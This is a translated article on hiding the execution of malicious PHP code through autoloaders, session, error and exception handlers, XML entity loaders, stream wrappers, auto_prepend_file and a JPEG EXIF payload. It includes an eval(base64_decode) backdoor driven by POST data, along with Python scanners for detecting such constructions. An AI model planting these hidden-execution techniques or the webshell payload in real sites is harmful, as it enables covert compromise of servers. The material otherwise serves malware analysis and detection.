
Advanced methods of implicitly calling PHP code used in malicious scripts

This is the second part of the note on implicit calls of PHP code in malicious scripts. Here I consider more complex and less obvious ways of using various PHP handlers and loaders, and at the end of the article I give a few examples of how hackers still manage to invoke malicious code and PHP scripts on a site implicitly.

As an example of malicious code, we will again use the call

    echo 'Test';

Since the goal of the article is to show the various approaches and mechanisms for hidden code execution, for simplicity the function that executes our "malicious code" is declared right next to the code that implicitly calls it. In real life the malicious code and its call are far apart, at least in different PHP scripts; more often the code is loaded from the database, from image metadata or from another server, and then executed by functions such as eval, assert, preg_replace and the like.



Option #1: use the autoload mechanism.

The malicious code is invoked in an autoload handler when a nonexistent class is instantiated.

    <?php
    // __autoload() is deprecated since PHP 7.2 and removed in PHP 8.0
    function __autoload($classname) {
        echo 'Test';
    }
    // ...
    new myEvilClass();   // no such class exists, so the autoloader runs


Option #2: use another autoload mechanism (PHP 5.3 and higher).

    <?php
    // php >= 5.3.0
    class EvilClass {
        static public function evil($name) {
            echo 'Test';
        }
    }
    // ...
    spl_autoload_register(__NAMESPACE__ . '\EvilClass::evil');
    // ...
    new Malware;   // undefined class, so EvilClass::evil('Malware') is called


Option #3: use the session handler.

When the session is started, the registered open callback is called.

    <?php
    function just_do_it() {
        echo 'Test';
    }
    // ...
    $f = function() {};
    // callbacks: open, close, read, write, destroy, gc; open runs on session_start()
    session_set_save_handler("just_do_it", $f, $f, $f, $f, $f);
    @session_start();


Option #4: use an iterator.

For a change, we will not declare a function explicitly. In the variant below, the function body can be taken as a string from any storage and turned into a function at runtime.

    <?php
    // create_function() is deprecated since PHP 7.2 and removed in PHP 8.0
    $f = create_function('', "echo 'Test';");
    // ...
    $it = new ArrayIterator(array(''));
    iterator_apply($it, $f, array($it));   // calls $f for the single element


Option #5: call through an exception handler.

In this variant, the code to run is passed as the exception message.

    <?php
    function exception_handler($e) {
        // the empty pattern '||' always matches, so the callback built from the message runs
        preg_replace_callback('||', create_function('', $e->getMessage()), '');
    }
    // ...
    set_exception_handler('exception_handler');
    // ...
    throw new Exception('echo "Test";');


Option #6: use an error handler.

The approach is similar to #5, but the code is called implicitly through trigger_error() or user_error(). The code itself is passed in the error message. Note that this works regardless of the error_reporting setting.

    <?php
    function error_handler($errno, $errstr, $errfile, $errline) {
        array_map(create_function('', $errstr), array(''));
    }
    // ...
    set_error_handler('error_handler');
    $badcode = 'echo "Test";';
    trigger_error($badcode, E_USER_ERROR);
    // user_error() is an alias of trigger_error()


Option #7: use your own external entity loader.

Works since PHP 5.4. The malicious code can sit in XML tags or in the service fields of the document.

    <?php
    // php >= 5.4
    // note: before PHP 7.3 the closing heredoc markers (XML; DTD;) must start at column 0
    $xml = <<<XML
    <!DOCTYPE zlodei PUBLIC "echo 'Test';" "http://example/">
    <zlodei>bar</zlodei>
    XML;
    $dtd = <<<DTD
    <!ELEMENT zlodei (#PCDATA)>
    DTD;
    // called when validate() tries to fetch the external DTD; the public id carries the code
    libxml_set_external_entity_loader(
        function ($public, $system, $context) use ($dtd) {
            array_reduce(array(''), create_function('', $public));
        }
    );
    // ...
    $dd = new DOMDocument;
    $r = $dd->loadXML($xml);
    @$dd->validate();


Option #8: create your own stream wrapper for an implicit code call.

A stream wrapper is registered, and any function that works with streams can then execute code passed in the URL or written to the stream. For a change, instead of the banal eval(), the code is called via create_function().

    <?php
    class MalwareStream {
        function stream_open($path, $mode, $options, &$opened_path) {
            $url = parse_url($path);
            $f = create_function('', $url["host"]);   // the "host" part of the URL is the code
            $f();
            return true;
        }
    }
    // ...
    stream_wrapper_register("malw", "MalwareStream");
    // ...
    $fp = fopen('malw://echo "Test";', '');


Unlike the constructions listed in the previous note, implicit calls like these are quite hard to detect with static analysis, and server-side antivirus scanners cannot do it yet.

Bonus track

What other options do hackers use to download and execute malicious code?

First, the auto_prepend_file / auto_append_file directives in .htaccess or php.ini. For example,

    php_value auto_prepend_file /images/stories/mycode.jpg

will execute the code from mycode.jpg before any script is run.

Secondly, dynamic loading of extensions with the dl() function. For this, a .so (*nix) or .dll (Windows) module must be compiled. This is quite rare, but it does happen. Advanced hackers can develop and inject modules into Apache or nginx.

Thirdly, the backtick construction (an alias for shell_exec()):

    <?php
    $a = `ls -la`;
    echo $a;

It will also execute the system command ls -la, provided, of course, that shell_exec is enabled in the PHP settings.
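As an added triage helper (not from the original article): a heuristic scanner that flags, per line, the handler registrations and dynamic-code sinks used by the eight options above and by the bonus-track mechanisms (auto_prepend_file, dl(), backticks, EXIF metadata used as input). The signature names, weights and sample inputs are this example's own constructions, and a hit is only a reason to look closer, not proof of compromise.

```python
import re

# Heuristic signatures for the implicit-call constructions discussed above.
# Weights are this example's own rough prioritisation, not a published scale.
SIGNATURES = [
    ("autoload hook",           r"\b(?:__autoload|spl_autoload_register)\s*\(", 2),
    ("session save handler",    r"\bsession_set_save_handler\s*\(", 2),
    ("exception/error handler", r"\bset_(?:exception|error)_handler\s*\(", 1),
    ("external entity loader",  r"\blibxml_set_external_entity_loader\s*\(", 3),
    ("stream wrapper",          r"\bstream_wrapper_register\s*\(", 3),
    ("create_function",         r"\bcreate_function\s*\(", 3),
    ("eval/assert",             r"\b(?:eval|assert)\s*\(", 3),
    # literal preg_replace pattern whose modifier list contains 'e'
    ("preg_replace /e",         r"\bpreg_replace\s*\(\s*(['\x22])([^\w\s'\x22\\])(?:(?!\1).)*?\2[a-zA-Z]*e[a-zA-Z]*\1", 4),
    ("backtick shell_exec",     r"`[^`\n]+`", 3),
    ("exif metadata as input",  r"\bexif_read_data\s*\(", 2),
    ("auto_prepend/append",     r"\bauto_(?:prepend|append)_file\b", 4),
    ("dl() extension load",     r"\bdl\s*\(", 3),
]
COMPILED = [(label, re.compile(rx), weight) for label, rx, weight in SIGNATURES]

def scan_source(text):
    """Return (score, hits) for one PHP or .htaccess file; hits are (line_no, label)."""
    hits, score = [], 0
    for no, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith(("//", "#", "*")):   # crude: skip comment-only lines
            continue
        for label, rx, weight in COMPILED:
            if rx.search(line):
                hits.append((no, label))
                score += weight
    return score, hits

# Constructed samples modelled on the snippets above; not real malware.
SAMPLE_PHP = """<?php
$exif = exif_read_data('/home/website/images/stories/food/evil.jpg');
preg_replace($exif['Make'], $exif['Model'], '');
stream_wrapper_register("malw", "MalwareStream");
$f = create_function('', $url["host"]);
// eval($legacy);  commented out, so the scanner ignores it
$a = `ls -la`;
"""
SAMPLE_HTACCESS = "php_value auto_prepend_file /images/stories/mycode.jpg\n"
SAMPLE_CLEAN = "<?php\necho htmlspecialchars($_GET['q']);\n"

if __name__ == "__main__":
    for name, src in (("php", SAMPLE_PHP), ("htaccess", SAMPLE_HTACCESS), ("clean", SAMPLE_CLEAN)):
        print(name, *scan_source(src))
```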

And finally, an example of an implicit code call whose code is loaded from the EXIF header of a JPEG file.

    <?php
    $exif = exif_read_data('/home/website/images/stories/food/evil.jpg');
    // pattern and replacement both come from the image; the /e modifier evaluates the
    // replacement as PHP (deprecated since PHP 5.5, removed in PHP 7.0)
    preg_replace($exif['Make'], $exif['Model'], '');


The JPEG file looks like this:

yOya^@^PJFIF^@^A^B^@^@d^@d^@^@ya^@?Exif^@^@II*^@
^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@yi^@^QDucky^@^A^@^D^@^@^@<^@^@yi^@^NAdobe^...


/.*/e is taken from the Make field, @eval(base64_decode(...)) from the Model field, and it is executed via preg_replace() because of the "e" modifier.
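As an added defensive counterpart (not part of the original article): a checker that walks the segment chain of an uploaded JPEG to the APP1/Exif segment, reads Make and Model from IFD0, and flags values that look like PHP code or like a delimited regex ending in an e modifier. build_exif_jpeg is a constructed helper that produces a minimal test image; the base64 in the sample decodes to echo "Test";.

```python
import re
import struct

MAKE, MODEL = 0x010F, 0x0110   # TIFF/EXIF tag ids for Make and Model (type 2 = ASCII)

def build_exif_jpeg(make, model):
    """Constructed minimal JPEG: SOI, one APP1/Exif segment with only Make/Model, EOI."""
    make_b, model_b = make.encode() + b"\0", model.encode() + b"\0"
    make_off = 8 + 2 + 2 * 12 + 4            # header + count + two entries + next-IFD ptr
    tiff = b"II*\0" + struct.pack("<IH", 8, 2)   # little-endian, IFD0 at offset 8, 2 entries
    tiff += struct.pack("<HHII", MAKE, 2, len(make_b), make_off)   # values > 4 bytes: by offset
    tiff += struct.pack("<HHII", MODEL, 2, len(model_b), make_off + len(make_b))
    tiff += struct.pack("<I", 0) + make_b + model_b
    app1 = b"Exif\0\0" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"

def read_make_model(jpeg):
    """Return {'Make': ..., 'Model': ...} from IFD0, the fields the snippet above feeds to preg_replace."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    pos, found = 2, {}
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF and jpeg[pos + 1] not in (0xD9, 0xDA):
        marker = jpeg[pos + 1]
        length = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        seg, pos = jpeg[pos + 4:pos + 2 + length], pos + 2 + length
        if marker != 0xE1 or not seg.startswith(b"Exif\0\0"):
            continue
        tiff = seg[6:]
        end = "<" if tiff[:2] == b"II" else ">"
        ifd = struct.unpack(end + "I", tiff[4:8])[0]
        count = struct.unpack(end + "H", tiff[ifd:ifd + 2])[0]
        for i in range(count):
            e = ifd + 2 + 12 * i
            tag, typ, n, val = struct.unpack(end + "HHII", tiff[e:e + 12])
            if tag in (MAKE, MODEL) and typ == 2:
                raw = tiff[val:val + n] if n > 4 else struct.pack(end + "I", val)[:n]   # short values sit inline
                found["Make" if tag == MAKE else "Model"] = raw.split(b"\0")[0].decode("latin-1")
        break
    return found

# PHP code markers, or a whole value shaped like a delimited regex whose modifiers contain 'e'.
SUSPECT = re.compile(r"\beval\s*\(|base64_decode|\$_(?:GET|POST|REQUEST)\b|^(\W).*\1[a-zA-Z]*e[a-zA-Z]*$", re.S)

def suspicious_metadata(jpeg):
    """Names of Make/Model fields that look like code rather than a camera name."""
    return [k for k, v in read_make_model(jpeg).items() if SUSPECT.search(v)]
```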

Thank you for your attention.

Source: https://habr.com/ru/post/215817/
